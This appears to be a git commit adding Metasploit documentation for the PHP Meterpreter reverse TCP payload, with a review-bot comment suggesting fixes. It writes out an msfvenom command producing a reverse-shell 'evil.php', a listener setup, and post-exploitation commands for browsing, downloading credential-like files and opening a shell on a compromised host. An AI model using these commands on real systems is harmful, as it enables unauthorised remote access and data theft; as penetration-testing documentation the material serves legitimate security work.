Create reverse_tcp.md (#1)
parent fa016de78a
commit cb870b3d07
@ -0,0 +1,154 @@
The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module _can_ be cross platform, but the target needs to be able to run php code.


## Vulnerable Application

The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default.

## Deploying php/meterpreter/reverse_tcp
### Scenarios

Specific demo of using the module that might be useful in a real world scenario.

#### Generating a file with msfvenom
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php
```


#### Starting a listener
```
msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [IP]
```

## Important Basic Commands

Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter
has less commands, but here's a list of all the common ones you might need:

**pwd command**

The ```pwd``` command tells you the current working directory. For example:

```
meterpreter > pwd
/Users/thecarterb/Desktop
```

**cd command**

The ```cd``` command allows you to change directories. Example:

```
meterpreter > cd /Users/thecarterb/Desktop
meterpreter > pwd
/Users/thecarterb/Desktop
```

**cat command**

The ```cat``` command allows you to see the content of a file:

```
meterpreter > cat /tmp/data.txt
Hello World!
```

**upload command**

The ```upload``` command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example:

```
meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop
[*] uploading : /tmp/data.txt -> /Users/thecarterb/Desktop
[*] uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt
meterpreter >
```

**download command**

The ```download``` command allows you to download a file from the remote target to your machine.
For example:

```
meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt
[*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
[*] download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
meterpreter >
```

**search command**

The ```search``` command allows you to find files on the remote file system. For example,
this shows how to find all text files in the current directory:

```
meterpreter > search -d . -f *.txt
Found 2 results...
.\pass.txt (13 bytes)
./creds\data.txt (83 bytes)
meterpreter >
```

Without the ```-d``` option, the command will attempt to search in all drives.

The ```-r``` option for the command allows you to search recursively.


**getuid command**

The ```getuid``` command tells you the current user that Meterpreter is running on. For example:

```
meterpreter > getuid
Server username: root
```

**execute command**

The ```execute``` command allows you to execute a command or file on the remote machine.

The following examples uses the command to create a text file:

```
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 73642 created.
meterpreter >
```

**ps command**

The ```ps``` command lists the running processes on the remote machine.

**shell command**

The ```shell``` command allows you to interact with the remote machine's command prompt (or shell).
For example:

```
meterpreter > shell
Process 74513 created.
Channel 2 created.
sh-3.2#
```

If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.

**sysinfo**

The ```sysinfo``` command shows you basic information about the remote machine. Such as:

* Computer name
* OS name
* Architecture
* Meterpreter type

## Using `post` modules
When using the PHP Meterpreter, you have the feature of using Metasploit's `post` modules on that specific session. By default, most `multi` post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use `osx` post modules on that session.

__Don't forget to:__
- Set the `LHOST` datastore option to the connect-back IP Address
- If you want to get multiple shells, set `ExitOnSession` to `false`
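Review bot: the "Starting a listener" block stops at `set LHOST [IP]` and never starts the handler, so a reader who follows the transcript verbatim has nothing listening when the generated `evil.php` calls back; the block should end with the command that actually runs `multi/handler`, and since the closing checklist recommends `ExitOnSession` set to `false`, it should show the handler started as a background job so that setting takes effect. Two smaller correctness points in the command examples: the `download` example passes `/tmp/pass.txt` as the destination but the output shows it treated as a directory (`/tmp/pass.txt/data.txt`), which readers will take for a bug, so either name the destination as a directory or explain that behaviour; and the `search` output mixes `.\pass.txt` with `./creds\data.txt`, which looks like a pasted listing from a different host rather than output captured from the OS X target used everywhere else in the doc, so it should be re-captured. The claim "OS X has PHP installed by default" should state which OS X versions were tested rather than stand as a blanket statement. Wording: "has less commands" should read "has fewer commands", and "The following examples uses" should read "The following example uses".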